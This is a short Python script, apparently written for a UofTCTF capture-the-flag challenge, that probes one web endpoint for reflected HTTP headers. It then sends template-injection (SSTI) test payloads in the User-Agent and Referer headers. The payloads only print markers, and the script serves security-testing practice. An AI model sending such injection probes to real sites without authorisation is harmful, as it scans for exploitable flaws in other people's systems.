#!/usr/bin/env python3
"""
Test if headers are rendered in templates (like User-Agent, Referer, etc.)
"""

import requests
import urllib3
urllib3.disable_warnings()

BASE_URL = "https://vulnerability-research-dbfd88d4dab49dc2.chals.uoftctf.org"

def test_header_injection():
    """Test if HTTP headers get rendered in the page"""
    
    headers_to_test = {
        "User-Agent": "MARKER_UA_12345",
        "Referer": "MARKER_REF_12345",
        "X-Forwarded-For": "MARKER_XFF_12345",
        "Cookie": "custom=MARKER_COOKIE_12345"
    }
    
    response = requests.get(
        BASE_URL + "/welcome/default/index",
        headers=headers_to_test,
        verify=False
    )
    
    print(f"Response length: {len(response.text)}")
    
    for header, value in headers_to_test.items():
        if value in response.text:
            print(f"\n[+] {header} header found in response!")
            idx = response.text.find(value)
            print(f"Context: {response.text[max(0,idx-100):idx+150]}")
    
    # Now test with SSTI payloads
    print("\n" + "="*60)
    print("Testing SSTI in headers")
    print("="*60)
    
    ssti_headers = {
        "User-Agent": "{{='SSTI_UA_MARKER'}}",
        "Referer": "{{='SSTI_REF_MARKER'}}"
    }
    
    response2 = requests.get(
        BASE_URL + "/welcome/default/index",
        headers=ssti_headers,
        verify=False
    )
    
    # Check if markers appear (evaluated)
    for marker in ["SSTI_UA_MARKER", "SSTI_REF_MARKER"]:
        if marker in response2.text:
            print(f"[!!!] SSTI marker '{marker}' found - SSTI in headers works!")
            idx = response2.text.find(marker)
            print(f"Context: {response2.text[max(0,idx-100):idx+150]}")
    
    with open("header_test.html", "w", encoding="utf-8") as f:
        f.write(response2.text)
    print("\nSaved to header_test.html")

if __name__ == "__main__":
    test_header_injection()